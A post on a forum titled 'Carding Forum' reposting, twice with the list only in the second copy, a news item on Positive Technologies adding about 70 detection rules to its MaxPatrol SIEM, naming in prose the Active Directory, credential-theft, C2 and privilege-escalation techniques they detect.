Carding Forum
Professional
- Messages
- 2,788
- Reaction score
- 1,176
- Points
- 113
Positive Technologies strengthens the SIEM system against modern attacks.
Positive Technologies has announced an update for its MaxPatrol SIEM information security event monitoring and incident management system . About 70 new rules for detecting cyber threats have been integrated into the product, and additional mechanisms have been introduced to facilitate the work of analysts and significantly reduce the time required to investigate incidents.
The biggest changes were made to the rules aimed at detecting attacks on Active Directory. The update covers tactics such as "Initial Access", "Execution", "Privilege Escalation", "Detection Prevention" and "Credential Access". The new rules will allow you to detect both new attack methods, such as using the SOAPHound utility, and long-known techniques.
The company noted that threats for which new rules have been developed require an immediate response. New enrichment mechanisms allow you to supplement correlated and normalized events with useful information about indicators of compromise, which focuses the operator's attention on the most important ones and speeds up the process of validating suspicious events.
The rules for detecting cyber threats added to MaxPatrol SIEM will allow you to identify:
Additionally, the product introduces mechanisms that complement normalized information security events with compromise indicators, increasing the accuracy of detecting cyber threats. MaxPatrol SIEM also adds a feature to automatically extract URLs from the command line for all correlation events. These features help specialists collect information faster and reduce the time required to analyze each incident.
To use the new MaxPatrol SIEM rules and features, you must install the rules from the Expertise package (available for all system versions starting from version 7.2)
Source
Positive Technologies has announced an update for its MaxPatrol SIEM information security event monitoring and incident management system . About 70 new rules for detecting cyber threats have been integrated into the product, and additional mechanisms have been introduced to facilitate the work of analysts and significantly reduce the time required to investigate incidents.
The biggest changes were made to the rules aimed at detecting attacks on Active Directory. The update covers tactics such as "Initial Access", "Execution", "Privilege Escalation", "Detection Prevention" and "Credential Access". The new rules will allow you to detect both new attack methods, such as using the SOAPHound utility, and long-known techniques.
The company noted that threats for which new rules have been developed require an immediate response. New enrichment mechanisms allow you to supplement correlated and normalized events with useful information about indicators of compromise, which focuses the operator's attention on the most important ones and speeds up the process of validating suspicious events.
The rules for detecting cyber threats added to MaxPatrol SIEM will allow you to identify:
- Attacks on Microsoft Active Directory related to the certification service (Active Directory Certificate Services, AD CS). Such attacks are among the most successfully implemented. MaxPatrol SIEM detects attacks in which access to AD CS components is used to remotely execute code and obtain NTLM hashes of accounts. In addition, the product detects attacks that use Active Directory group policies, which allow IT administrators to centrally manage user roles and computers. Attackers can use group policies to spoof programs, run the processes they need on devices, or add accounts.
- New tools for cybercriminals. For example, the product tracks the activity of the SOAPHound utility, which retrieves data from the Active Directory environment without interacting directly with the LDAP server in order to stay out of the view of security tools.
- Suspicious file accesses to the Telegram messenger API disguised as legitimate actions. This allows MaxPatrol SIEM to detect C2 channels that attackers use to exchange data with compromised devices, download malware, and move stolen information to their servers.
- Malicious actions aimed at seizing credentials and gaining initial access to systems. Using the new rules, MaxPatrol SIEM detects forced authentication, as a result of which attackers receive NTLM password hashes. Then, cybercriminals can try to authenticate with the system using hashes or pick up passwords in clear text.
- Exploiting a series of vulnerabilities called Potato Vulnerabilities . These security flaws allow cybercriminals to upgrade privileges from a service account to system rights. To detect such activities, five new rules have been loaded into MaxPatrol SIEM.
Additionally, the product introduces mechanisms that complement normalized information security events with compromise indicators, increasing the accuracy of detecting cyber threats. MaxPatrol SIEM also adds a feature to automatically extract URLs from the command line for all correlation events. These features help specialists collect information faster and reduce the time required to analyze each incident.
To use the new MaxPatrol SIEM rules and features, you must install the rules from the Expertise package (available for all system versions starting from version 7.2)
Source
